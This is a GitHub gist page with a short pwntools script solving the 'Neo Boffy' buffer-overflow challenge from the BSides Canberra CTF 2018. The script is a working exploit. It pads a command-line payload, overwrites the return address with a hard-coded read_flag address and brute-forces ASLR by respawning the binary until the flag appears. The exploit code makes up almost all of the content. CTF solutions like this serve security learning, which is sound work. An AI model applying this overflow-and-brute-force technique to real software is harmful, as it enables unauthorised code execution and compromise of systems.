Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Solution to Neo Boffy from the BSides Canberra CTF 2018
from pwn import *
bin_path = "./neo_boffy"
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
context(log_level="ERROR")
# Can't send NULLs, but can send empty strings
def cmdify(str): return str.split("\x00")
read_flag_offset = 0x8d0
read_flag = 0x565ee000 + read_flag_offset # Hard code since there is no aslr leak
loop_cap = 0x78 # This is where the loop caps
payload = ""
payload += "\x00" * 3 # ensure we can keep looping
payload += p32(read_flag)
payload += chr(loop_cap - 1 - len(payload))
payload = payload.rjust(0x79, "A")
# Keep trying until we find it
while True:
p = process([bin_path] + cmdify(payload))
out = p.recvall()
if "CTF{" in out:
print(out)
break
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.